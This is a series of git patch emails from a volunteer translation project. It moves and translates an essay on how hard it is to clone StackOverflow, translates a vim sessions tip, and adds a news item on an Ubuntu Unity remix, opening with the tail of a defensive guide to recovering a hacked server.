to create and enable these firewall rules on the server itself and then, when they are in place kill the attacker’s ssh session with the kill command. + +A final method, where available, is to log into the server via an out-of-band connection such as the serial console and stop networking with systemctl stop network.service. This will completely stop any network access so you can now enable the firewall rules in your own time. + +Once you have regained control of the server do not trust it. + +Do not attempt to fix things up and continue using the server. You can never be sure what the attacker did and so you can never sure the server is secure. + +The only sensible course of action is to copy off all the data that you need and start again from a fresh install. + +-------------------------------------------------------------------------------- + +via: https://bash-prompt.net/guides/server-hacked/ + +作者:[Elliot Cooper][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://bash-prompt.net From 7118ad361c8bdddaba7c66c464737c3b76e44bf2 Mon Sep 17 00:00:00 2001 From: hopefully2333 <787016457@qq.com> Date: Mon, 4 Dec 2017 01:05:04 +0800 Subject: [PATCH 0210/1627] final version (#6435) * Delete 20090701 The One in Which I Call Out Hacker News.md * final version final version created in 12.3 23:56 --- ...The One in Which I Call Out Hacker News.md | 86 ---------------- ...The One in Which I Call Out Hacker News.md | 99 +++++++++++++++++++ 2 files changed, 99 insertions(+), 86 deletions(-) delete mode 100644 sources/tech/20090701 The One in Which I Call Out Hacker News.md create mode 100644 translated/tech/20090701 The One in Which I Call Out Hacker News.md diff --git a/sources/tech/20090701 The One in Which I Call Out Hacker News.md b/sources/tech/20090701 The One in Which I Call Out Hacker News.md deleted file mode 100644 index 44c751dd5a..0000000000 --- a/sources/tech/20090701 The One in Which I Call Out Hacker News.md +++ /dev/null @@ -1,86 +0,0 @@ -translating by hopefully2333 - -# [The One in Which I Call Out Hacker News][14] - - -> “Implementing caching would take thirty hours. Do you have thirty extra hours? No, you don’t. I actually have no idea how long it would take. Maybe it would take five minutes. Do you have five minutes? No. Why? Because I’m lying. It would take much longer than five minutes. That’s the eternal optimism of programmers.” -> -> — Professor [Owen Astrachan][1] during 23 Feb 2004 lecture for [CPS 108][2] - -[Accusing open-source software of being a royal pain to use][5] is not a new argument; it’s been said before, by those much more eloquent than I, and even by some who are highly sympathetic to the open-source movement. Why go over it again? - -On Hacker News on Monday, I was amused to read some people saying that [writing StackOverflow was hilariously easy][6]—and proceeding to back up their claim by [promising to clone it over July 4th weekend][7]. Others chimed in, pointing to [existing][8] [clones][9] as a good starting point. - -Let’s assume, for sake of argument, that you decide it’s okay to write your StackOverflow clone in ASP.NET MVC, and that I, after being hypnotized with a pocket watch and a small club to the head, have decided to hand you the StackOverflow source code, page by page, so you can retype it verbatim. We’ll also assume you type like me, at a cool 100 WPM ([a smidge over eight characters per second][10]), and unlike me,  _you_  make zero mistakes. StackOverflow’s *.cs, *.sql, *.css, *.js, and *.aspx files come to 2.3 MB. So merely typing the source code back into the computer will take you about eighty hours if you make zero mistakes. - -Except, of course, you’re not doing that; you’re going to implement StackOverflow from scratch. So even assuming that it took you a mere ten times longer to design, type out, and debug your own implementation than it would take you to copy the real one, that already has you coding for several weeks straight—and I don’t know about you, but I am okay admitting I write new code  _considerably_  less than one tenth as fast as I copy existing code. - - _Well, okay_ , I hear you relent. *So not the whole thing. But I can do **most** of it.* - -Okay, so what’s “most”? There’s simply asking and responding to questions—that part’s easy. Well, except you have to implement voting questions and answers up and down, and the questioner should be able to accept a single answer for each question. And you can’t let people upvote or accept their own answers, so you need to block that. And you need to make sure that users don’t upvote or downvote another user too many times in a certain amount of time, to prevent spambots. Probably going to have to implement a spam filter, too, come to think of it, even in the basic design, and you also need to support user icons, and you’re going to have to find a sanitizing HTML library you really trust and that interfaces well with Markdown (provided you do want to reuse [that awesome editor][11] StackOverflow has, of course). You’ll also need to purchase, design, or find widgets for all the controls, plus you need at least a basic administration interface so that moderators can moderate, and you’ll need to implement that scaling karma thing so that you give users steadily increasing power to do things as they go. - -But if you do  _all that_ , you  _will_  be done. - -Except…except, of course, for the full-text search, especially its appearance in the search-as-you-ask feature, which is kind of indispensable. And user bios, and having comments on answers, and having a main page that shows you important questions but that bubbles down steadily à la reddit. Plus you’ll totally need to implement bounties, and support multiple OpenID logins per user, and send out email notifications for pertinent events, and add a tagging system, and allow administrators to configure badges by a nice GUI. And you’ll need to show users’ karma history, upvotes, and downvotes. And the whole thing has to scale really well, since it could be slashdotted/reddited/StackOverflown at any moment. - -But  _then_ ! **Then** you’re done! - -…right after you implement upgrades, internationalization, karma caps, a CSS design that makes your site not look like ass, AJAX versions of most of the above, and G-d knows what else that’s lurking just beneath the surface that you currently take for granted, but that will come to bite you when you start to do a real clone. - -Tell me: which of those features do you feel you can cut and still have a compelling offering? Which ones go under “most” of the site, and which can you punt? - -Developers think cloning a site like StackOverflow is easy for the same reason that open-source software remains such a horrible pain in the ass to use. When you put a developer in front of StackOverflow, they don’t really  _see_ StackOverflow. What they actually  _see_  is this: - -``` -create table QUESTION (ID identity primary key, - TITLE varchar(255), --- why do I know you thought 255? - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - USER integer references USER(ID)); -create table RESPONSE (ID identity primary key, - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - QUESTION integer references QUESTION(ID)) -``` - -If you then tell a developer to replicate StackOverflow, what goes into his head are the above two SQL tables and enough HTML to display them without formatting, and that really  _is_  completely doable in a weekend. The smarter ones will realize that they need to implement login and logout, and comments, and that the votes need to be tied to a user, but that’s still totally doable in a weekend; it’s just a couple more tables in a SQL back-end, and the HTML to show their contents. Use a framework like Django, and you even get basic users and comments for free. - -But that’s  _not_  what StackOverflow is about. Regardless of what your feelings may be on StackOverflow in general, most visitors seem to agree that the user experience is smooth, from start to finish. They feel that they’re interacting with a polished product. Even if I didn’t know better, I would guess that very little of what actually makes StackOverflow a continuing success has to do with the database schema—and having had a chance to read through StackOverflow’s source code, I know how little really does. There is a  _tremendous_  amount of spit and polish that goes into making a major website highly usable. A developer, asked how hard something will be to clone, simply  _does not think about the polish_ , because  _the polish is incidental to the implementation._ - -That is why an open-source clone of StackOverflow will fail. Even if someone were to manage to implement most of StackOverflow “to spec,” there are some key areas that would trip them up. Badges, for example, if you’re targeting end-users, either need a GUI to configure rules, or smart developers to determine which badges are generic enough to go on all installs. What will actually happen is that the developers will bitch and moan about how you can’t implement a really comprehensive GUI for something like badges, and then bikeshed any proposals for standard badges so far into the ground that they’ll hit escape velocity coming out the other side. They’ll ultimately come up with the same solution that bug trackers like Roundup use for their workflow: the developers implement a generic mechanism by which anyone, truly anyone at all, who feels totally comfortable working with the system API in Python or PHP or whatever, can easily add their own customizations. And when PHP and Python are so easy to learn and so much more flexible than a GUI could ever be, why bother with anything else? - -Likewise, the moderation and administration interfaces can be punted. If you’re an admin, you have access to the SQL server, so you can do anything really genuinely administrative-like that way. Moderators can get by with whatever django-admin and similar systems afford you, since, after all, few users are mods, and mods should understand how the sites  _work_ , dammit. And, certainly, none of StackOverflow’s interface failings will be rectified. Even if StackOverflow’s stupid requirement that you have to have and know how to use an OpenID (its worst failing) eventually gets fixed, I’m sure any open-source clones will rabidly follow it—just as GNOME and KDE for years slavishly copied off Windows, instead of trying to fix its most obvious flaws. - -Developers may not care about these parts of the application, but end-users do, and take it into consideration when trying to decide what application to use. Much as a good software company wants to minimize its support costs by ensuring that its products are top-notch before shipping, so, too, savvy consumers want to ensure products are good before they purchase them so that they won’t  _have_  to call support. Open-source products fail hard here. Proprietary solutions, as a rule, do better. - -That’s not to say that open-source doesn’t have its place. This blog runs on Apache, [Django][12], [PostgreSQL][13], and Linux. But let me tell you, configuring that stack is  _not_  for the faint of heart. PostgreSQL needs vacuuming configured on older versions, and, as of recent versions of Ubuntu and FreeBSD, still requires the user set up the first database cluster. MS SQL requires neither of those things. Apache…dear heavens, don’t even get me  _started_  on trying to explain to a novice user how to get virtual hosting, MovableType, a couple Django apps, and WordPress all running comfortably under a single install. Hell, just trying to explain the forking vs. threading variants of Apache to a technically astute non-developer can be a nightmare. IIS 7 and Apache with OS X Server’s very much closed-source GUI manager make setting up those same stacks vastly simpler. Django’s a great a product, but it’s nothing  _but_  infrastructure—exactly the thing that I happen to think open-source  _does_  do well,  _precisely_  because of the motivations that drive developers to contribute. - -The next time you see an application you like, think very long and hard about all the user-oriented details that went into making it a pleasure to use, before decrying how you could trivially reimplement the entire damn thing in a weekend. Nine times out of ten, when you think an application was ridiculously easy to implement, you’re completely missing the user side of the story. - --------------------------------------------------------------------------------- - -via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ - -作者:[Benjamin Pollack][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://bitquabit.com/meta/about/ -[1]:http://www.cs.duke.edu/~ola/ -[2]:http://www.cs.duke.edu/courses/cps108/spring04/ -[3]:https://bitquabit.com/categories/programming -[4]:https://bitquabit.com/categories/technology -[5]:http://blog.bitquabit.com/2009/06/30/one-which-i-say-open-source-software-sucks/ -[6]:http://news.ycombinator.com/item?id=678501 -[7]:http://news.ycombinator.com/item?id=678704 -[8]:http://code.google.com/p/cnprog/ -[9]:http://code.google.com/p/soclone/ -[10]:http://en.wikipedia.org/wiki/Words_per_minute -[11]:http://github.com/derobins/wmd/tree/master -[12]:http://www.djangoproject.com/ -[13]:http://www.postgresql.org/ -[14]:https://bitquabit.com/post/one-which-i-call-out-hacker-news/ diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md new file mode 100644 index 0000000000..670be95353 --- /dev/null +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -0,0 +1,99 @@ +我号召黑客新闻的理由之一 +实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? +不,你没有。 +我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间,这是程序员永远的 +乐观主义。 +- Owen Astrachan 教授于 2004 年 2 月 23 日在 CPS 108 上的讲座 + +指责开源软件的使用存在着高昂的代价已经不是一个新论点了,它之前就被提过,而且说的比我更有信服力,即使一些人已经在高度赞扬开源软件的运作。 +这种事为什么会重复发生? + +在周一的黑客新闻上,我愉悦地看着某些人一边说写 Stack Overflow 简单的简直搞笑,一边通过允许七月第四个周末之后的克隆来开始备份他们的提问。 +其他的声明中也指出现存的克隆是一个好的出发点。 + +让我们假设,为了争辩,你觉得将自己的 Stack Overflow 通过 ASP.NET 和 MVC 克隆是正确的,然后被一块廉价的手表和一个小型俱乐部头领忽悠之后, +决定去手动拷贝你 Stack Overflow 的源代码,一页又一页,所以你可以逐字逐句地重新输入,我们同样会假定你像我一样打字,很酷的有 100 WPM +(差不多每秒8个字符),不和我一样的话,你不会犯错。 + + Stack Overflow 的 *.cs、*.sql、*.css、*.js 和 *.aspx 文件大约 2.3 MB,因此如果你想将这些源代码输进电脑里去的话,即使你不犯错也需要大约 80 个小时。 + +除非......当然,你是不会那样做的:你打算从头开始实现 Stack Overflow 。所以即使我们假设,你花了十倍的时间去设计、输出,然后调试你自己的实现而不是去拷 +贝已有的那份,那已经让你已经编译了好几个星期。我不知道你,但是我可以承认我写的新代码大大小于我复制的现有代码的十分之一。 + +好,ok,我听见你松了口气。所以不是全部。但是我可以做大部分。 + +行,所以什么是大部分?这只是询问和回答问题,这个部分很简单。那么,除了你必须实现对问题和答案投票、赞同还是反对,而且提问者应该能够去接收每一个问题的 +单一答案。你不能让人们赞同或者反对他们自己的回答。所以你需要去阻止。你需要去确保用户在一定的时间内不会赞同或反对其他用户太多次。以预防垃圾邮件, +你可能也需要去实现一个垃圾邮件过滤器,即使在一个基本的设计里,也要考虑到这一点。而且还需要去支持用户图标。并且你将不得不寻找一个自己真正信任的并且 +与 markdown 接合很好的 HTML 库(当然,你确实希望重新使用那个令人敬畏的编辑器 Stack Overflow ),你还需要为所有控件购买,设计或查找小部件,此外 +你至少需要一个基本的管理界面,以便用户可以调节,并且你需要实现可扩展的业务量,以便能稳定地给用户越来越多的功能去实现他们想做的。 + +如果你这样做了,你可以完成它。 + +除了...除了全文检索外,特别是它在“寻找问题”功能中的表现,这是必不可少的。然后用户的基本信息,和回答的意见,然后有一个主要展示你的重要问题, +但是它会稳定的冒泡式下降。另外你需要去实现奖励,并支持每个用户的多个 OpenID 登录,然后为相关的事件发送邮件通知,并添加一个标签系统, +接着允许管理员通过一个不错的图形界面配置徽章。你需要去显示用户的 karma 历史,点赞和差评。整个事情的规模都非常好,因为它随时都可以被 + slashdotted、reddited 或是 Stack Overflow 。 + +在这之后!你就已经完成了! + +...在正确地实现升级、国际化、业绩上限和一个 css 设计之后,使你的站点看起来不像是一个屁股,上面的大部分 AJAX 版本和 G-d 知道什么会同样潜伏 +在你所信任的界面下,但是当你开始做一个真正的克隆的时候,就会遇到它。 + +告诉我:这些功能中哪个是你感觉可以削减而让它仍然是一个引人注目的产品,哪些是大部分网站之下的呢?哪个你可以剔除呢? + +开发者因为开源软件的使用是一个可怕的痛苦这样一个相同的理由认为克隆一个像 Stack Overflow 的站点很简单。当你把一个开发者放在 Stack Overflow 前面, +他们并不真的看到 Stack Overflow,他们实际上看的是这些: + +create table QUESTION (ID identity primary key, + TITLE varchar(255), --- 为什么我知道你认为是 255 + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + USER integer references USER(ID)); +create table RESPONSE (ID identity primary key, + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + QUESTION integer references QUESTION(ID)) + +如果你告诉一个开发者去复制 Stack Overflow ,进入他脑海中的就是上面的两个 SQL 表和足够的 HTML 文件来显示它们,而不用格式化,这在一个周末里是完全 +可以实现的,聪明的人会意识到他们需要实现登陆、注销和评论,点赞需要绑定到用户。但是这在一个周末内仍然是完全可行的。这仅仅是在 SQL 后端里加上两张 +左右的表,而 HTML 则用来展示内容,使用像 Django 这样的框架,你甚至可以免费获得基本的用户和评论。 + +但是那不是和 Stack Overflow 相关的,无论你对 Stack Overflow 的感受如何,大多数访问者似乎都认为用户体验从头到尾都很流畅,他们感觉他们和一个 +好产品相互影响。即使我没有更好的了解,我也会猜测 Stack Overflow 在数据库模式方面取得了持续的成功-并且有机会去阅读 Stack Overflow 的源代码, +我知道它实际上有多么的小,这些是一个极大的 spit 和 Polish 的集合,成为了一个具有高可用性的主要网站,一个开发者,问一个东西被克隆有多难, +仅仅不认为和 Polish 相关,因为 Polish 是实现结果附带的。 + +这就是为什么 Stack Overflow 的开放源代码克隆会失败,即使一些人在设法实现大部分 Stack Overflow 的“规范”,也会有一些关键区域会将他们绊倒, +举个例子,如果你把目标市场定在了终端用户上,你要么需要一个图形界面去配置规则,要么聪明的开发者会决定哪些徽章具有足够的通用性,去继续所有的 +安装,实际情况是,开发者发牢骚和抱怨你不能实现一个真实的综合性的像 badges 的图形用户界面,然后 bikeshed 任何的建议,为因为标准的 badges +在范围内太远,他们会迅速避开选择其他方向,他们最后会带着相同的有 bug 追踪器的解决方案赶上,就像他们工作流程的概要使用一样: +开发者通过任意一种方式实现一个通用的机制,任何一个人完全都能轻松地使用 Python、PHP 或任意一门语言中的系统 API 来工作,能简单为他们自己增加 +自定义设置,PHP 和 Python 是学起来很简单的,并且比起曾经的图形界面更加的灵活,为什么还要操心其他事呢? + +同样的,节制和管理界面可以被削减。如果你是一个管理员,你可以进入 SQL 服务器,所以你可以做任何真正的管理-就像这样,管理员可以通过任何的 Django +管理和类似的系统给你提供支持,因为,毕竟只有少数用户是 mods,mods 应该理解网站是怎么运作、停止的。当然,没有 Stack Overflow 的接口失败会被纠正 +,即使 Stack Overflow 的愚蠢的要求,你必须知道如何去使用 openID (它是最糟糕的缺点)最后得到修复。我确信任何的开源的克隆都会狂热地跟随它- +即使 GNOME 和 KDE 多年来亦步亦趋地复制 windows ,而不是尝试去修复它自己最明显的缺陷。 + +开发者可能不会关心应用的这些部分,但是最终用户会,当他们尝试去决定使用哪个应用时会去考虑这些。就好像一家好的软件公司希望通过确保其产品在出货之前 +是一流的来降低其支持成本一样,所以,同样的,懂行的消费者想在他们购买这些产品之前确保产品好用,以便他们不需要去寻求帮助,开源产品就失败在这种地方 +,一般来说,专有解决方案会做得更好。 + +这不是说开源软件没有他们自己的立足之地,这个博客运行在 Apache,Django,PostgreSQL 和 Linux 上。但是让我告诉你,配置这些堆栈不是为了让人心灰意懒 +,PostgreSQL 需要在老版本上移除设置。然后,在 Ubuntu 和 FreeBSD 最新的版本上,仍然要求用户搭建第一个数据库集群,MS SQL不需要这些东西,Apache... +天啊,甚至没有让我开始尝试去向一个初学者用户解释如何去得到虚拟机,MovableType,一对 Django 应用程序,而且所有的 WordPress 都可以在一个单一的安装下 +顺利运行,像在地狱一样,只是试图解释 Apache 的分叉线程变换给技术上精明的非开发人员就是一个噩梦,IIS 7 和操作系统的 Apache 服务器是非常闭源的, +图形界面管理程序配置这些这些相同的堆栈非常的简单,Django 是一个伟大的产品,但是它只是基础架构而已,我认为开源软件做的很好,恰恰是因为推动开发者去 +贡献的动机 + +下次你看见一个你喜欢的应用,认为所有面向用户的细节非常长和辛苦,就会去让它用起来更令人开心,在谴责你如何能普通的实现整个的可恶的事在一个周末, +十分之九之后,当你认为一个应用的实现简单地简直可笑,你就完全的错失了故事另一边的用户 + +via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ + +作者:Benjamin Pollack 译者:hopefully2333 校对:校对者ID + +本文由 LCTT 原创编译,Linux中国 荣誉推出 From 95d447053943ddccb728cc2a5919f0136827d8ef Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 09:12:25 +0800 Subject: [PATCH 0211/1627] Update 20170910 Cool vim feature sessions.md --- sources/tech/20170910 Cool vim feature sessions.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170910 Cool vim feature sessions.md b/sources/tech/20170910 Cool vim feature sessions.md index 8c0506e086..ed101c429c 100644 --- a/sources/tech/20170910 Cool vim feature sessions.md +++ b/sources/tech/20170910 Cool vim feature sessions.md @@ -1,3 +1,5 @@ +translating---geekpi + Cool vim feature: sessions! ============================================================• From dff154b15893a6564e4acec1e8527320ecf4c867 Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 09:18:57 +0800 Subject: [PATCH 0212/1627] translating --- sources/tech/20171108 Archiving repositories.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171108 Archiving repositories.md b/sources/tech/20171108 Archiving repositories.md index 3537254131..4038ca8a9f 100644 --- a/sources/tech/20171108 Archiving repositories.md +++ b/sources/tech/20171108 Archiving repositories.md @@ -1,3 +1,5 @@ +translating---geekpi + Archiving repositories ==================== From de7fe68ba38606a86f38e82bd9f9099368756d1d Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 09:33:40 +0800 Subject: [PATCH 0213/1627] translating---geekpi --- ...New Feature Find every domain someone owns automatically.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/sources/tech/20171130 New Feature Find every domain someone owns automatically.md b/sources/tech/20171130 New Feature Find every domain someone owns automatically.md index 4b9fedf168..c3371b8376 100644 --- a/sources/tech/20171130 New Feature Find every domain someone owns automatically.md +++ b/sources/tech/20171130 New Feature Find every domain someone owns automatically.md @@ -1,3 +1,6 @@ +translating---geekpi + + New Feature: Find every domain someone owns automatically ============================================================ From f486489ac029ea1cea66b4d75fe0518c41041e63 Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 09:57:03 +0800 Subject: [PATCH 0214/1627] translating --- sources/tech/20171116 Introducing security alerts on GitHub.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171116 Introducing security alerts on GitHub.md b/sources/tech/20171116 Introducing security alerts on GitHub.md index 0bfef7757d..1f00b5d4aa 100644 --- a/sources/tech/20171116 Introducing security alerts on GitHub.md +++ b/sources/tech/20171116 Introducing security alerts on GitHub.md @@ -1,3 +1,5 @@ +translating---geekpi + Introducing security alerts on GitHub ==================================== From dd88a35a6df0e8ebc05947ab25b4117dd25712a8 Mon Sep 17 00:00:00 2001 From: Ezio Date: Mon, 4 Dec 2017 10:16:28 +0800 Subject: [PATCH 0215/1627] =?UTF-8?q?20171204-1=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Unity from the Dead as an Official Spin.md | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md diff --git a/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md b/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md new file mode 100644 index 0000000000..0e38373c3f --- /dev/null +++ b/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md @@ -0,0 +1,41 @@ +Someone Tries to Bring Back Ubuntu's Unity from the Dead as an Official Spin +============================================================ + + + +> The Ubuntu Unity remix would be supported for nine months + +Canonical's sudden decision of killing its Unity user interface after seven years affected many Ubuntu users, and it looks like someone now tries to bring it back from the dead as an unofficial spin. + +Long-time [Ubuntu][1] member Dale Beaudoin [ran a poll][2] last week on the official Ubuntu forums to take the pulse of the community and see if they are interested in an Ubuntu Unity Remix that would be released alongside Ubuntu 18.04 LTS (Bionic Beaver) next year and be supported for nine months or five years. + +Thirty people voted in the poll, with 67 percent of them opting for an LTS (Long Term Support) release of the so-called Ubuntu Unity Remix, while 33 percent voted for the 9-month supported release. It also looks like this upcoming Ubuntu Unity Spin [looks to become an official flavor][3], yet this means commitment from those developing it. + +"A recent poll voted 2/3rds in favor of Ubuntu Unity to become an LTS distribution. We should try to work this cycle assuming that it will be LTS and an official flavor," said Dale Beaudoin. "We will try and release an updated ISO once every week or 10 days using the current 18.04 daily builds of default Ubuntu Bionic Beaver as a platform." + +### Is Ubuntu Unity making a comeback? + +The last Ubuntu version to ship with Unity by default was Ubuntu 17.04 (Zesty Zapus), which will reach end of life on January 2018\. Ubuntu 17.10 (Artful Artful), the current stable release of the popular operating system, is the first to use the GNOME desktop environment by default for the main Desktop edition as Canonical CEO [announced][4] earlier this year that Unity would no longer be developed. + +However, Canonical is still offering the Unity desktop environment from the official software repositories, so if someone wants to install it, it's one click away. But the bad news is that they'll be supported up until the release of Ubuntu 18.04 LTS (Bionic Beaver) in April 2018, so the developers of the Ubuntu Unity Remix would have to continue to keep in on life support on their a separate repository. + +On the other hand, we don't believe Canonical will change their mind and accept this Ubuntu Unity Spin to become an official flavor, which would mean they failed to continue development of Unity, and now a handful of people can do it. Most probably, if interest in this Ubuntu Unity Remix won't fade away soon, it will be an unofficial spin supported by the nostalgic community. + +Question is, would you be interested in an Ubuntu Unity spin, official or not? + +-------------------------------------------------------------------------------- + +via: http://news.softpedia.com/news/someone-tries-to-bring-back-ubuntu-s-unity-from-the-dead-as-an-unofficial-spin-518778.shtml + +作者:[Marius Nestor ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://news.softpedia.com/editors/browse/marius-nestor +[1]:http://linux.softpedia.com/downloadTag/Ubuntu +[2]:https://community.ubuntu.com/t/poll-unity-7-distro-9-month-spin-or-lts-for-18-04/2066 +[3]:https://community.ubuntu.com/t/unity-maintenance-roadmap/2223 +[4]:http://news.softpedia.com/news/canonical-to-stop-developing-unity-8-ubuntu-18-04-lts-ships-with-gnome-desktop-514604.shtml +[5]:http://news.softpedia.com/editors/browse/marius-nestor From c1a07ebaba40e6ef32d69af2f201a6b6b2cf0151 Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 10:20:20 +0800 Subject: [PATCH 0216/1627] translating --- sources/tech/20171201 Linux Journal Ceases Publication.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171201 Linux Journal Ceases Publication.md b/sources/tech/20171201 Linux Journal Ceases Publication.md index 0bb9b3a77b..8963b183fe 100644 --- a/sources/tech/20171201 Linux Journal Ceases Publication.md +++ b/sources/tech/20171201 Linux Journal Ceases Publication.md @@ -1,3 +1,5 @@ +translating---geekpi + Linux Journal Ceases Publication ============================================================ From c3a2917ebb2e84e06f1c307c4b543ef67b59932e Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 10:30:26 +0800 Subject: [PATCH 0217/1627] translated --- .../20170910 Cool vim feature sessions.md | 93 ++++++++++--------- 1 file changed, 47 insertions(+), 46 deletions(-) rename {sources => translated}/tech/20170910 Cool vim feature sessions.md (60%) diff --git a/sources/tech/20170910 Cool vim feature sessions.md b/translated/tech/20170910 Cool vim feature sessions.md similarity index 60% rename from sources/tech/20170910 Cool vim feature sessions.md rename to translated/tech/20170910 Cool vim feature sessions.md index ed101c429c..462d6362b2 100644 --- a/sources/tech/20170910 Cool vim feature sessions.md +++ b/translated/tech/20170910 Cool vim feature sessions.md @@ -1,46 +1,47 @@ -translating---geekpi - -Cool vim feature: sessions! -============================================================• - -Yesterday I learned about an awesome vim feature while working on my [vimrc][5]! (to add fzf & ripgrep search plugins mainly). It’s a builtin feature, no fancy plugins needed. - -So I drew a comic about it. - -Basically you can save all your open files and current state with - -``` -:mksession ~/.vim/sessions/foo.vim - -``` - -and then later restore it with either `:source ~/.vim/sessions/foo.vim` or `vim -S ~/.vim/sessions/foo.vim`. Super cool! - -Some vim plugins that add extra features to vim sessions: - -* [https://github.com/tpope/vim-obsession][1] - -* [https://github.com/mhinz/vim-startify][2] - -* [https://github.com/xolox/vim-session][3] - -Here’s the comic: - -![](https://jvns.ca/images/vimsessions.png) - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/2017/09/10/vim-sessions/ - -作者:[Julia Evans ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/about -[1]:https://github.com/tpope/vim-obsession -[2]:https://github.com/mhinz/vim-startify -[3]:https://github.com/xolox/vim-session -[4]:https://jvns.ca/categories/vim -[5]:https://github.com/jvns/vimconfig/blob/master/vimrc +translating---geekpi + +Cool vim feature: sessions! +vim 的酷功能:会话! +============================================================• + +昨天我在编写我的[vimrc][5]的时候了解到一个很酷的 vim 功能!(主要为了添加 fzf 和 ripgrep 插件)。这是一个内置功能,不需要特别的插件。 + +所以我画了一个漫画。 + +基本上你可以用下面的命令保存所有你打开的文件和当前的状态 + +``` +:mksession ~/.vim/sessions/foo.vim + +``` + +接着用 `:source ~/.vim/sessions/foo.vim` 或者  `vim -S ~/.vim/sessions/foo.vim` 还原会话。非常酷! + +一些 vim 插件给 vim 会话添加了额外的功能: + +* [https://github.com/tpope/vim-obsession][1] + +* [https://github.com/mhinz/vim-startify][2] + +* [https://github.com/xolox/vim-session][3] + +这是漫画: + +![](https://jvns.ca/images/vimsessions.png) + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/09/10/vim-sessions/ + +作者:[Julia Evans ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:https://github.com/tpope/vim-obsession +[2]:https://github.com/mhinz/vim-startify +[3]:https://github.com/xolox/vim-session +[4]:https://jvns.ca/categories/vim +[5]:https://github.com/jvns/vimconfig/blob/master/vimrc From 2e5cee7d444f106081e2d3fc8f3fd7b6de265bc1 Mon Sep 17 00:00:00 2001 From: Ezio Date: Mon, 4 Dec 2017 10:31:45 +0800 Subject: [PATCH 0218/1627] =?UTF-8?q?20171204-2=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/20171112 Love Your Bugs.md | 311 ++++++++++++++++++++++++ 1 file changed, 311 insertions(+) create mode 100644 sources/tech/20171112 Love Your Bugs.md diff --git a/sources/tech/20171112 Love Your Bugs.md b/sources/tech/20171112 Love Your Bugs.md new file mode 100644 index 0000000000..bf79f27cf7 --- /dev/null +++ b/sources/tech/20171112 Love Your Bugs.md @@ -0,0 +1,311 @@ +Love Your Bugs +============================================================ + +In early October I gave a keynote at [Python Brasil][1] in Belo Horizonte. Here is an aspirational and lightly edited transcript of the talk. There is also a video available [here][2]. + +### I love bugs + +I’m currently a senior engineer at [Pilot.com][3], working on automating bookkeeping for startups. Before that, I worked for [Dropbox][4] on the desktop client team, and I’ll have a few stories about my work there. Earlier, I was a facilitator at the [Recurse Center][5], a writers retreat for programmers in NYC. I studied astrophysics in college and worked in finance for a few years before becoming an engineer. + +But none of that is really important to remember – the only thing you need to know about me is that I love bugs. I love bugs because they’re entertaining. They’re dramatic. The investigation of a great bug can be full of twists and turns. A great bug is like a good joke or a riddle – you’re expecting one outcome, but the result veers off in another direction. + +Over the course of this talk I’m going to tell you about some bugs that I have loved, explain why I love bugs so much, and then convince you that you should love bugs too. + +### Bug #1 + +Ok, straight into bug #1\. This is a bug that I encountered while working at Dropbox. As you may know, Dropbox is a utility that syncs your files from one computer to the cloud and to your other computers. + + + +``` + +--------------+ +---------------+ + | | | | + | METASERVER | | BLOCKSERVER | + | | | | + +-+--+---------+ 